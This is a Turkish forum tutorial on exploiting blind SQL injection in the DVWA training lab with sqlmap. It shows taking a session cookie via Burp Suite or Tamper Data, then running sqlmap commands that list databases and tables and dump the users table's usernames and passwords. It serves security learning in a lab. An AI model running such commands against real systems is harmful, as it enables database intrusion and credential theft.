Neler Yeni

DVWA Blind Sql İnjection With Sqlmap

Katılım
22 Nis 2020
Mesajlar
86
Tepkime puanı
23
Puanları
150
Selamun Aleyküm / Aleyküm Selam.
Bu Konumuzda DVWA Ortamı Üzerinde Sqlmap aracı ile birlikte blind sql injection işlemini uygulayacağız.

Blind(Kör) Sql İnjection zahmetli ve deneme yanılma isteyen bir işlemdir,çünkü url sonuna tek tırnak attığımızda hata almayız.
Kısaca Blind Sql İnjection sayfa hata vermezken körlemesine yapılan sql saldırılarına verilen isimdir.

Blind Sql İnjection‘da Deneme Yanılma ile süreç ilerler tamamen tahminlere bağlıdır ve aşırı zaman alabilir.
İşte Bu sebepten devreye sqlmap giriyor sqlmap bu tahminleri bizim için kısa bir sürede yapıp sonuç veriyor.


Konuya Geçelim;
DVWA Üzerinde Blind Sql Kısmına Geldik;
Bizi Bir Metin Kutusu Karşıladı;
Ekran-goruntusu-20200504005234-704x141.png



User İD Girelim örnek 1
İD Değeri olarak 1 Girdim User ID exists in the database. (Kullanıcı kimliği veritabanında var.) Diye yanıt aldık.
Ekran-goruntusu-20200504005252-681x161.png


Bir Yandan URL Kısmındaki Değişimlere Dikkatli Bakalım;
Url‘yi alıp bir not defterine kayıt edelim.
Submit=Submit
gnome-shell-screenshot-33SUJ0.png



Şimdi Sayfayı Yenileyeyim ve Tamper Data veya Burp Suiteyi Açalım, bu araçlardan birini kullanarak cookie alacağız hangisini kullanmak isterseniz kullanabilirsiniz. (Önerim BurpSuite)
Cookie oturum bilgilerini saklar. Cookie‘yi testimizi güçlendirmek için kullanılır. Cookie Sistemin Tarayıcıya göndermiş olduğu bazı değişkenleri kullanarak saldırmaya yarar.

Burp Suite İle Cookie Alma;
Burp Suite‘ye girdik gt;Proxy gt;İntruder gt;İntercept is off‘un üzerine tıklayarak on yapıyoruz.
Bu Şekilde Gelen,giden İstekleri Görebilir ve Değiştirerek Response yani cevap verebiliriz.
Ama Bizim işimize yarayacak kısım sadece request kısmı.

İntercept‘in ON olduğuna emin olduktan sonra firefox üzerinde tekrar id değerine 1 girip submit dedik.
Ve Request önümüze düştü;
Ekran-goruntusu-20200504012106-815x407.png


Bize Lazım Olan Kısım;
Ekran-goruntusu-20200504015528-488x33.png



TamperData İle Cookie Alma;
TamperData‘yı Açtık;
6.png


Start Tamper dedik ve DVWA scriptindeki blind kısmındaki metin kutucuğuna yine id değerini 1 girdik ve istek önümüze düştü.
ASD.png

DSA.png



Bize Lazım Olan Kısım;
SDSDSD.png

Cookie;
ASDAD.png



Şimdi Sql İnjection İşlemine geçelim. (Ben TamperData‘dan aldığım cookie‘yi kullanacağım.)
sqlmap -u " " --cookie="security=low; PHPSESSID=hf3u0nhuflehnpl5j1ebm9dpl8" --dbs şeklinde komut girdik.
asdasd0c73872dcdd62918.png


Gördüğünüz gibi İşlemimiz Başarılı Gidiyor.
id kısmında blind sql olduğunu söylüyor.
ASDADASDASD.png



Ve Databaseye Girdik;
available databases [2]:
[*] dvwa1
[*] information_schema
ASDASD.png



sqlmap -u " " --cookie="security=low; PHPSESSID=hf3u0nhuflehnpl5j1ebm9dpl8" -D dvwa1 --tables komutu ile tabloları çektik;
Database: dvwa1
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
Karşımıza guestbook ve users adında 2 adet tablo çıktı
asdasdsad.png



sqlmap -u " " --cookie="security=low; PHPSESSID=hf3u0nhuflehnpl5j1ebm9dpl8" -D dvwa1 -T users --columns diyerek users tablosunun kolonlarını çekiyoruz.
Ekran-goruntusu-20200504003758-725x463.png


Sıra Geldi
sqlmap -u " " --cookie="security=low; PHPSESSID=hf3u0nhuflehnpl5j1ebm9dpl8" -D dvwa1 -T users -C username,password --dump komutu ile username ve password içindeki verileri çekmesi için sqlmapa komut verdik;
Ekran-goruntusu-20200504003817-725x463.png



Sonuç;
Blind Sql İnjection açıklı scrpitteki zafiyeti sqlmap ile sömürerek Databasedeki verilere ulaştık.
Ekran-goruntusu-20200504003844-725x463.png


Selametle.
 

Konuyu görüntüleyen kullanıcılar

Üst